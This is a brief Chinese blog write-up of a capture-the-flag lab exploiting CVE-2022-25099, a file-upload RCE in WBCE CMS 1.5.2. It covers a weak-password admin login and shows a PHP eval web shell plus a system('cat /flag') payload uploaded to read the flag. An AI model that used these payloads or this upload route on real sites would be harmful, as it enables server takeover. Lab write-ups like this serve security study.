CVE-2022-25099(WBCE CMS v1.5.2 RCE)

题目网址:https://yunjing.ichunqiu.com/cve/detail/746?type=1&pay=2

WBCE CMS v1.5.2 /language/install.php 文件存在漏洞,攻击者可精心构造文件上传造成RCE

访问/admin进入后台登录页面

image-20251013112424956

设置强制使用HTTPS

image-20251013113538855

弱密码登录admin/123456

image-20251013113639380

找到存在漏洞的地方

image-20251013113828793

image-20251013113843031

传一句话木马

1
<?php eval($_POST['shell']);?>

image-20251013114013983

不过被过滤了,不能远程连接

image-20251013114218011

不过可以直接RCE

1
2
3
<?php
system('cat /flag');
?>

image-20251013114350403

春秋云镜 > RCE
#RCE
CVE-2022-25099(WBCE CMS v1.5.2 RCE)
https://yschen20.github.io/2025/10/13/CVE-2022-25099(WBCE-CMS-v1-5-2-RCE)/
作者
Suzen
发布于
2025年10月13日
更新于
2025年10月13日
许可协议